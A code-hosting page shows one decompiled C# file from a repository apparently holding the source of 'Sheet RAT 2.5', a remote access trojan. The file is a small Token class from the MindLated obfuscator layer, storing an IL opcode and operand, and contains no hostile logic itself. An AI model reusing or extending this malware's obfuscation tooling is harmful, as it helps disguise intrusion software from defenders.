Files
sheet-rat/Server/MindLated/Protection/Arithmetic/Token.cs
T

34 lines
772 B
C#
Raw Normal View History

2026-08-27 11:23:25 -06:00
// Decompiled with JetBrains decompiler
// Type: MindLated.Protection.Arithmetic.Token
// Assembly: Server, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 33673F0A-7F43-4A2B-BC08-8E59A15CB7DA
// Assembly location: C:\Users\Admin\Desktop\Sheet RAT 2.5\Server.exe
using dnlib.DotNet.Emit;
//#nullable disable
namespace MindLated.Protection.Arithmetic {
public class Token
{
private readonly OpCode _opCode;
private readonly object _operand;
public Token(OpCode opCode, object operand)
{
this._opCode = opCode;
this._operand = operand;
}
public Token(OpCode opCode)
{
this._opCode = opCode;
this._operand = (object) null;
}
public OpCode GetOpCode() => this._opCode;
public object GetOperand() => this._operand;
}
}